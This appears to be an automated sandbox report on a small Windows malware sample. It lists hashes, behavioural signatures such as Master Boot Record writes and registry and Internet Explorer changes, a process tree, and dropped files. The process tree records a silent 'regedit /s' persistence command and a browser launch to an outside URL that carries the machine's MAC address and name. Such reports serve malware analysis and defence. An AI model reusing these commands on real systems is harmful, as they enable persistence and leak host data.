Analysis

  • max time kernel
    53s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-12-2022 19:03

General

  • Target

    cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe

  • Size

    16KB

  • MD5

    59d6ad851d8331958d24e884785ab03d

  • SHA1

    83c91010843b1d6b483caf07ec026fbf07e1ab50

  • SHA256

    cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426

  • SHA512

    91d2d0aefe94a8b1ee4ca4099e47e2439b0321bc58ee266024c4324d8e72dd0aa70224425c64f85ec80c1aedc852fdc8e43fda8088a9cd84e0a435bb95611056

  • SSDEEP

    384:EISV9Jl+eAykm/iXYK7SGbbfv9ngnNP+aZnZzudhfa+H2:Knb4mfLmJK+anZ8hfx2

Score
6/10

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe
    "C:\Users\Admin\AppData\Local\Temp\cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:5020
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38078.comget.asp?mac=D2A4FF929712&makedate=QM00013&comput=Home&ver=81&userid=0
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4984 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3668

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\getback.reg

    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

  • memory/880-132-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

  • memory/880-138-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

  • memory/3172-135-0x0000000000000000-mapping.dmp

  • memory/5020-136-0x0000000000000000-mapping.dmp